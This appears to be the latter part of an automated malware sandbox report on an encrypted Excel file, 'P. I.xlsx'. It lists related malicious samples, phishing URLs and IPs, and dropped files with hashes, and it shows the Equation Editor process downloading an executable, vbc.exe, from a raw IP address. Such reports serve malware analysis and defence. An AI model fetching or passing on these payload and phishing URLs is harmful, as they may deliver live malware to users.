                                                                                                                                                                    Order.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 111.235.136.11
                                                                                                                                                                    https://netorg5311404-my.sharepoint.com/:b:/g/personal/andrea_qualityprocessing_info/EU-DL-xouWZDquK3qv92wvwBIcu9lc-F04jNh2b57Qd8OA?at=9&e=4%3a0LgAJFGet hashmaliciousBrowse
                                                                                                                                                                    • 101.100.216.158
                                                                                                                                                                    https://ssosscast.com/onmicrosoft/onedrive000Get hashmaliciousBrowse
                                                                                                                                                                    • 101.100.216.158
                                                                                                                                                                    1.12.2018.jsGet hashmaliciousBrowse
                                                                                                                                                                    • 101.100.216.152
                                                                                                                                                                    1.12.2018.jsGet hashmaliciousBrowse
                                                                                                                                                                    • 101.100.216.152
                                                                                                                                                                    430#U0437.jsGet hashmaliciousBrowse
                                                                                                                                                                    • 101.100.216.152
                                                                                                                                                                    430#U0437.jsGet hashmaliciousBrowse
                                                                                                                                                                    • 101.100.216.152
                                                                                                                                                                    43som_output3492B3.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 101.100.210.100
                                                                                                                                                                    9SOA-XPF-9009016.PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 101.100.210.100
                                                                                                                                                                    41payment invoic.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 111.235.137.94
                                                                                                                                                                    13Enquiry List.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 103.11.190.165
                                                                                                                                                                    42RFQ Requirements for IPREN BV Belgium.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 103.11.189.189
                                                                                                                                                                    GOOGLEUShttps://ptfsca-my.sharepoint.com/:b:/g/personal/kevin_ptfs_ca/EboJWCmd9RVCrP7-u8pvAqYBYBaOrLxrf1qbZLFVjshCAA?e=4%3aaaD17Q&at=9Get hashmaliciousBrowse
                                                                                                                                                                    • 216.58.215.225
                                                                                                                                                                    https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3DGet hashmaliciousBrowse
                                                                                                                                                                    • 172.217.168.20
                                                                                                                                                                    http://45.146.165.216Get hashmaliciousBrowse
                                                                                                                                                                    • 172.217.22.98
                                                                                                                                                                    Shipping INVOICE-BL Shipment..exeGet hashmaliciousBrowse
                                                                                                                                                                    • 34.102.136.180
                                                                                                                                                                    2zv940v7.dllGet hashmaliciousBrowse
                                                                                                                                                                    • 216.58.215.225
                                                                                                                                                                    zojNE48815.apkGet hashmaliciousBrowse
                                                                                                                                                                    • 8.8.4.4
                                                                                                                                                                    ANGEBOTXANFORDERNXXXXXXXXX26-11-2020.pptGet hashmaliciousBrowse
                                                                                                                                                                    • 172.217.168.1
                                                                                                                                                                    http://nity.midlidl.com/indexGet hashmaliciousBrowse
                                                                                                                                                                    • 216.58.206.1
                                                                                                                                                                    https://agjwxdkpqlmqklurjaovxhcdfc-dot-gloff00403993445.uk.r.appspot.com/#kynan.doha@fordway.com&data=04|01|kynan.doha@fordway.com|e82b1ab95d564094873f08d891edc7dc|92f571261c684e5180855cb2e14cc381|1|0|637419797746769194|Unknown|TWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=|1000&sdata=ZTxemzXa/xUx+Bg3lTShaT+EzejxRYLSPxP6RLnzsM0=&reserved=0Get hashmaliciousBrowse
                                                                                                                                                                    • 172.217.168.84
                                                                                                                                                                    https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3DGet hashmaliciousBrowse
                                                                                                                                                                    • 172.217.168.52
                                                                                                                                                                    http://pma.climabitus.com/undercook.phpGet hashmaliciousBrowse
                                                                                                                                                                    • 216.58.215.225
                                                                                                                                                                    https://brechi5.wixsite.com/owa-webmail-updatesGet hashmaliciousBrowse
                                                                                                                                                                    • 216.58.212.162
                                                                                                                                                                    PO98765.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 34.102.136.180
                                                                                                                                                                    Booking Confirmation.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 34.102.136.180
                                                                                                                                                                    PI202009255687.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 34.102.136.180
                                                                                                                                                                    VOMAXTRADING.docGet hashmaliciousBrowse
                                                                                                                                                                    • 34.102.136.180
                                                                                                                                                                    ACCOUNT TEAM.pptGet hashmaliciousBrowse
                                                                                                                                                                    • 172.217.168.1
                                                                                                                                                                    purchase order.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 34.102.136.180
                                                                                                                                                                    inv.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 34.102.136.180
                                                                                                                                                                    http://email.balluun.com/ls/click?upn=0tHwWGqJA7fIfwq261XQPoa-2Bm5KwDIa4k7cEZI4W-2FdMZ1Q80M51jA5s51EdYNFwUO080OaXBwsUkIwQ6bL8cCo1cNcDJzlw2uVCKEfhUzZ7Fudhp6bkdbJB13EqLH9-2B4kEnaIsd7WRusADisZIU-2FqT0gWvSPQ-2BUMBeGniMV23Qog3fOaT300-2Fv2T0mA5uuaLf6MwKyAEEDv4vRU3MHAWtQ-3D-3DaUdf_BEBGVEU6IBswk46BP-2FJGpTLX-2FIf4Ner2WBFJyc5PmXI5kSwVWq-2FIninIJmDnNhUsSuO8YJPXc32diFLFly8-2FlazGQr8nbzBIO-2BSvdfUqJySNySwNZh5-2F7tiFSU4CooXZWp-2FjpdCX-2Fz89pGPVGN3nhMItFmIBBYMcjwlGWZ8vS3fpyiPHr-2BxekPNfR4Lq-2Baznil07vpcMoEZofdPQTnqnmg-3D-3DGet hashmaliciousBrowse
                                                                                                                                                                    • 172.217.168.84
                                                                                                                                                                    RMH-14UShttp://www.marketingprofs.com/images/email/7C84B0C9B698F30F466A07D02BBC03833022287036FD27DE94AC9E784E55BE26F82BCF9823CED845F9EB7678AC4BF8712C8706717C1D9550A8908F3EBB5048467449316403F75F7046CC9031D19F9D65/lgor.gifGet hashmaliciousBrowse
                                                                                                                                                                    • 72.3.191.176
                                                                                                                                                                    http://mail.wwip.comGet hashmaliciousBrowse
                                                                                                                                                                    • 166.78.154.137
                                                                                                                                                                    http://q5sxv.info/XNsp8N34LxGet hashmaliciousBrowse
                                                                                                                                                                    • 23.253.76.142
                                                                                                                                                                    chrisx.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 162.209.66.24
                                                                                                                                                                    http://174.143.146.246/~cosmo/vfghv.htmlGet hashmaliciousBrowse
                                                                                                                                                                    • 174.143.146.246
                                                                                                                                                                    http://rs112.zol.co.zwGet hashmaliciousBrowse
                                                                                                                                                                    • 66.216.86.92
                                                                                                                                                                    c7dh0AJEXM.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 23.253.126.58
                                                                                                                                                                    https://kmwconstruction.com/Get hashmaliciousBrowse
                                                                                                                                                                    • 174.143.65.160
                                                                                                                                                                    http://kmwconstruction.comGet hashmaliciousBrowse
                                                                                                                                                                    • 174.143.65.160
                                                                                                                                                                    AS-COLOCROSSINGUSEME_PO.47563.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 192.227.129.22
                                                                                                                                                                    Shipping documents.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 216.170.126.121
                                                                                                                                                                    document-2009439254.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.46.155.18
                                                                                                                                                                    document-2009439254.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.46.155.18
                                                                                                                                                                    document-1940099967.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.46.155.18
                                                                                                                                                                    document-1940099967.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.46.155.18
                                                                                                                                                                    document-2020425077.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.46.155.18
                                                                                                                                                                    document-2020425077.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.46.155.18
                                                                                                                                                                    document-1851433106.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.23.156.170
                                                                                                                                                                    document-1851433106.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.23.156.170
                                                                                                                                                                    document-1959916382.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.23.156.170
                                                                                                                                                                    document-1959916382.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.23.156.170
                                                                                                                                                                    document-2078943362.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.46.155.18
                                                                                                                                                                    document-1999796651.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.46.155.18
                                                                                                                                                                    document-2078943362.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.46.155.18
                                                                                                                                                                    document-1999796651.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.46.155.18
                                                                                                                                                                    document-189497319.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.23.156.170
                                                                                                                                                                    document-2004587833.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.23.156.170
                                                                                                                                                                    document-189497319.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.23.156.170
                                                                                                                                                                    document-184003024.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 198.23.156.170

                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                    No context

                                                                                                                                                                    Dropped Files

                                                                                                                                                                    No context

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):498176
                                                                                                                                                                    Entropy (8bit):7.4283796959793
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:zEEoEPCriH+klc6VMJ8sntRqM6V9i2gt8LF:OCKR67PE8
                                                                                                                                                                    MD5:DA5CE3FE1991B9ACEF3B0BEEC210EE9F
                                                                                                                                                                    SHA1:BB8C5001A1BB6087F9F36982C2A874ED9A802FE8
                                                                                                                                                                    SHA-256:483E1E8DC1D5E311AA8B11EFF1935721301ED7959E7868CDF60C101C02CCCEF3
                                                                                                                                                                    SHA-512:87A6F9D2D8EDE414DDE4062BAC5A6E34E7D6D2DA53BC78A61B627C09049B381344EDCFBA359019C94C6CC7CBA09359AA317AE3632251D11F212D96E8F34C6D39
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    IE Cache URL:http://198.23.212.188/reg/vbc.exe
                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$._..............0.............&.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...\.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......H................................................................0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*..s....}.....~....}.....(.......(.....*.0.............(........(......*.................0..4........r...p(.............s....}........{......(....}....*:..{....(....&*..0..................
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3396111E.jpeg
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):48770
                                                                                                                                                                    Entropy (8bit):7.801842363879827
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                    MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                    SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                    SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                    SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                    Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3EAFAC90.emf
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1099960
                                                                                                                                                                    Entropy (8bit):2.015295237077334
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:7Xtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:hahIFdyiaT2qtXw
                                                                                                                                                                    MD5:7AF585729C966E2395597B18AEF0177A
                                                                                                                                                                    SHA1:757785E38BD2CA2A0E1DA732CA6B62A48A4E7F51
                                                                                                                                                                    SHA-256:9BD5BD87CA837570E77954C7E1C9249C06EF7273192431ECF65CC27E2DD27D14
                                                                                                                                                                    SHA-512:617E135AC807B848CF9575D2373E8A63C83B138301036B52D37C59873B77A931C62B9AAC38FDC8F7E52B69C3C690324AA6FB7153D325B36BBDCCF4B90546D1BC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................).,.).......)...)..N.Q..)...).......).t.)..N.Q..)...). ....yTP..)...). .........M..zTP............................................X...%...7...................{ .@................C.a.l.i.b.r...............).X.....)...)..2MP..........)...)..{KP.... .)...M.dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7BD2351.jpeg
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):48770
                                                                                                                                                                    Entropy (8bit):7.801842363879827
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                    MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                    SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                    SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                    SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                    Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                    C:\Users\user\Desktop\~$P. I.xlsx
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):330
                                                                                                                                                                    Entropy (8bit):1.4377382811115937
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                    C:\Users\Public\vbc.exe
                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):498176
                                                                                                                                                                    Entropy (8bit):7.4283796959793
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:zEEoEPCriH+klc6VMJ8sntRqM6V9i2gt8LF:OCKR67PE8
                                                                                                                                                                    MD5:DA5CE3FE1991B9ACEF3B0BEEC210EE9F
                                                                                                                                                                    SHA1:BB8C5001A1BB6087F9F36982C2A874ED9A802FE8
                                                                                                                                                                    SHA-256:483E1E8DC1D5E311AA8B11EFF1935721301ED7959E7868CDF60C101C02CCCEF3
                                                                                                                                                                    SHA-512:87A6F9D2D8EDE414DDE4062BAC5A6E34E7D6D2DA53BC78A61B627C09049B381344EDCFBA359019C94C6CC7CBA09359AA317AE3632251D11F212D96E8F34C6D39
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$._..............0.............&.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...\.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......H................................................................0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*..s....}.....~....}.....(.......(.....*.0.............(........(......*.................0..4........r...p(.............s....}........{......(....}....*:..{....(....&*..0..................

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:CDFV2 Encrypted
                                                                                                                                                                    Entropy (8bit):7.962137270540166
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                    File name:P. I.xlsx
                                                                                                                                                                    File size:201728
                                                                                                                                                                    MD5:8600b18fcd47eb7a8708abdfd7266a88
                                                                                                                                                                    SHA1:6a7b0f2d86d7be943fc52c66156f7d3849c561ab
                                                                                                                                                                    SHA256:06aa501a864eff9930c64b5d9ac9ce52f947b0f993615823828d2a57c41f833a
                                                                                                                                                                    SHA512:66a8d2cf252ba259daf0fe952d6f17f55b65674e012933730a6a709199c5fc6b56cd08960f692787f15e826e0bea9d9d32d792eb16e997d29167cca5d7f21d41
                                                                                                                                                                    SSDEEP:6144:PjpBJ67+2MVkI6i1ZPr2r5d8SH9gZSV4deQqyJtayOI:bbJ65CjCdlHnVZQqAVZ
                                                                                                                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                    Static OLE Info

                                                                                                                                                                    General

                                                                                                                                                                    Document Type:OLE
                                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                                    OLE File "P. I.xlsx"

                                                                                                                                                                    Indicators

                                                                                                                                                                    Has Summary Info:False
                                                                                                                                                                    Application Name:unknown
                                                                                                                                                                    Encrypted Document:True
                                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                                    Contains Workbook/Book Stream:False
                                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                                    Flash Objects Count:
                                                                                                                                                                    Contains VBA Macros:False

                                                                                                                                                                    Streams

                                                                                                                                                                    Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:64
                                                                                                                                                                    Entropy:2.73637206947
                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                    Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                    Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                                    Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:112
                                                                                                                                                                    Entropy:2.7597816111
                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                    Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                    Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                                    Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:200
                                                                                                                                                                    Entropy:3.13335930328
                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                    Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                    Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                                    Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:\x6DataSpaces/Version
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:76
                                                                                                                                                                    Entropy:2.79079600998
                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                    Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                    Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                    Stream Path: EncryptedPackage, File Type: data, Stream Size: 194664
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:EncryptedPackage
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:194664
                                                                                                                                                                    Entropy:7.99850778936
                                                                                                                                                                    Base64 Encoded:True
